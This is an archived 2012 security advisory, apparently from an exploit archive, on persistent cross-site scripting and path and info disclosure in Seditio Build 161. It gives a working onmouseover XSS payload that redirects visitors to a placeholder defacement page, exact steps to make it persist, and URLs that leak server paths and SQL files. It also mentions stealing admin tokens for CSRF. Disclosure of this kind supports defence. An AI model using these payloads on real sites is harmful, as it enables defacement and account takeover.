Seditio Build 161 Cross Site Scripting / Information Disclosure

Seditio Build 161 Cross Site Scripting / Information Disclosure: Posted Mar 29, 2012; Authored by Akastep; Seditio Build 161 suffers from cross site scripting and information disclosure vulnerabilities.; tags | exploit, vulnerability, xss, info disclosure; SHA-256 | 24d00df977e36031d477611c3c82dacf901cc57e002426b7b8ff69be83dee52c; Download | Favorite | View

Seditio Build 161 Cross Site Scripting / Information Disclosure

==========================================================
Vulnerable Software: seditio-build161
==========================================================
Downloaded from:https://neocrome.net/page.php?id=2447&a=dl

# md5sum sed*.rar
aad96010a15f0c38e5cc321f8a91dd1b *seditio-build161.rar

Installation:Standart (i assume with default settings)

Tested:
==========================================================
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
    -> ;
+-----------+
| version() |
+-----------+
| 5.5.21    |
+-----------+
*/
==========================================================
Vuln Desc: PERSISTENT CROSS SITE SCRIPTING:
==========================================================
Exploitation:
Create new topic(/forums.php?m=newtopic&s=1)
using the following details:

Topic Title: Whatever you want.
Topic Description: Whatever you want.
Body:
Inject this: 
<a href="#" onmouseover="alert('You have Been Pwned) Meh Meh');window.top.location.href='https://defaced.tld/herewego.html'">You do not need click here!I will click it for you) Of course I ll pwn you)))</a>

Post the topic.

Then you'll see it as plaintext for first time.
Click the *EDIT* button but do not touch anything after this and simply Push the *UPDATE* button.
After update you'll return to your post.Try to over your mouse over the link.

Same rules and exploitation also applies to *Reply* section.
Remember you do not need touch anything after *edit* button you need only UPDATE the topic with your "payload" and thats all.
@Print screen on success pwn:
https://s43.radikal.ru/i099/1203/5d/2e2dfa119083.png

Other attacks also possible using XSS to steal security tokens and exploitate CSRF (change password or deface site automatically) using 
document.body.innerHTML(to steal administrator tokens)
==========================================================
Ok now about Info And Path Disclosure:
Try to Direct access:(Also previous versions too suffers from Info and Path disclosure)

https://192.168.0.15/learn/9/seditio/view.php

Parse error: syntax error, unexpected ')' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\core\view\view.inc.php on line 21
@https://www.neocrome.net/view.php

https://192.168.0.15/learn/9/seditio/plugins/contact/lang/contact.en.lang.php

Notice: Undefined variable: cfg in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\plugins\contact\lang\contact.en.lang.php on line 37


https://192.168.0.15/learn/9/seditio/system/lang/en/main.lang.php
Notice: Undefined variable: cfg in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\lang\en\main.lang.php on line 450


https://192.168.0.15/learn/9/seditio/system/lang/en/message.lang.php


Notice: Undefined variable: usr in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\lang\en\message.lang.php on line 37

Notice: Undefined variable: num in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\lang\en\message.lang.php on line 104
==============================================================================================================================
https://192.168.0.15/learn/9/seditio/system/core/view/view.inc.php
Parse error: syntax error, unexpected ')' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\core\view\view.inc.php on line 21

@https://www.neocrome.net/system/core/view/view.inc.php

===============================================================================================================================
Info disclosure:
https://192.168.0.15/learn/9/seditio/docs/new/seditio-createnew-160.sql
https://192.168.0.15/learn/9/seditio/docs/upgrade/sedito_convert_to_utf8.optional.sql

https://192.168.0.15/learn/9/seditio/system/install/install.parser.sql
IMO Needs at least simply .htaccess rule to protect from eyes this files.
===============================================================================================================================

/AkaStep  ^_^
1332959725

Top Authors In Last 30 Days

Red Hat 294 files
Ubuntu 64 files
Debian 24 files
Apple 14 files
LiquidWorm 12 files
Gentoo 8 files
Google Security Research 4 files
Andrey Stoykov 3 files
Jann Horn 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,171)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,070)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,426)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,010)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other

Seditio Build 161 Cross Site Scripting / Information Disclosure

Seditio Build 161 Cross Site Scripting / Information Disclosure

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Seditio Build 161 Cross Site Scripting / Information Disclosure

Share This

Seditio Build 161 Cross Site Scripting / Information Disclosure

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems